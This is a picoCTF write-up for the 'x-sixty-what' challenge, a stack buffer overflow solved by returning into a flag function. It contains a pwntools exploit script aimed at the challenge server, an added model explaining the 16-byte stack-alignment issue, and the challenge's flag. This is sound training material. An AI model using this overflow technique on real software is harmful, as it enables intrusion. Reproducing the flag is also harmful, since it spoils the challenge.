PicoCTF - x-sixty-what


Source code

:::spoiler


:::

Recon

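This challenge is a bit odd and not as simple as I expected. It looks like a plain return-to-function problem, and according to objdump the flag function should be at 0x401236, but returning there causes a segmentation fault. After reading other write-ups [1], I found that the return should go to 0x40123b; I'm not quite sure why.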

  • The first image is the return to 0x401236

  • The second image is the return to 0x40123b

Exploit

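  1. Find the offset dynamically: \(0x7fffffffd758 - 0x00007fffffffd710 = 0x48\)

```python
from pwn import *

r = remote('saturn.picoctf.net', 58166)
# r = process('./vuln')  # local testing instead of the remote service

context.arch = 'amd64'

input()  # pause here, e.g. to attach a debugger to the local process
print(r.recvline().strip().decode())

# 0x48 bytes of padding reach the saved return address, then the new target
payload = b'a' * 0x48 + p64(0x40123b)
print(payload)
r.sendline(payload)

r.interactive()
```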
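The segfault at 0x401236 and the clean run at 0x40123b are consistent with the x86-64 System V rule that rsp must be 16-byte aligned at every call site. The model below is an added example, not part of the original write-up: it tracks rsp through the start of flag() for each entry point. It assumes the function opens with `endbr64; push rbp; mov rbp, rsp` (the page does not show the disassembly) and that any later stack adjustment is a multiple of 16.

```python
# Added illustration: rsp alignment inside flag() for different entry points.
RET_SLOT = 0x7fffffffd758   # saved return address slot, from the write-up
FLAG_ENTRY = 0x401236       # flag() according to objdump, from the write-up
ALIGNED_RSP = RET_SLOT + 8  # rsp right after vuln()'s ret pops the slot

# ASSUMPTION: usual gcc prologue with CET; (mnemonic, size in bytes, rsp delta)
PROLOGUE = [
    ("endbr64", 4, 0),
    ("push rbp", 1, -8),
    ("mov rbp, rsp", 3, 0),
]

def entry_rsp(how):
    """rsp on arrival at the target, depending on how control got there."""
    if how == "call":   # an ordinary call pushes an 8-byte return address
        return ALIGNED_RSP - 8
    if how == "ret":    # a ret only pops; nothing is pushed for the callee
        return ALIGNED_RSP
    raise ValueError(how)

def rsp_after_prologue(target, how):
    """Run the prologue starting at `target` and return the resulting rsp."""
    addr, rsp = FLAG_ENTRY, entry_rsp(how)
    for _mnemonic, size, delta in PROLOGUE:
        if addr >= target:      # instructions before `target` never execute
            rsp += delta
        addr += size
    return rsp

def aligned_at_calls(target, how):
    """True if calls made from flag() would see a 16-byte aligned rsp."""
    return rsp_after_prologue(target, how) % 16 == 0

def summary():
    cases = {
        "normal call to 0x401236": (0x401236, "call"),
        "ret to 0x401236": (0x401236, "ret"),
        "ret to 0x40123b": (0x40123b, "ret"),
    }
    return {name: aligned_at_calls(*args) for name, args in cases.items()}

if __name__ == "__main__":
    for name, ok in summary().items():
        print(f"{name:26s} aligned={ok}")
```

Under these assumptions, a ret to the function's first byte leaves rsp 8 bytes off at every call inside flag(), which is where libc routines using aligned SSE instructions fault; landing after `push rbp` restores the alignment a normal call would have produced.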

Flag: picoCTF{b1663r_15_b3773r_e79d5a75}

Reference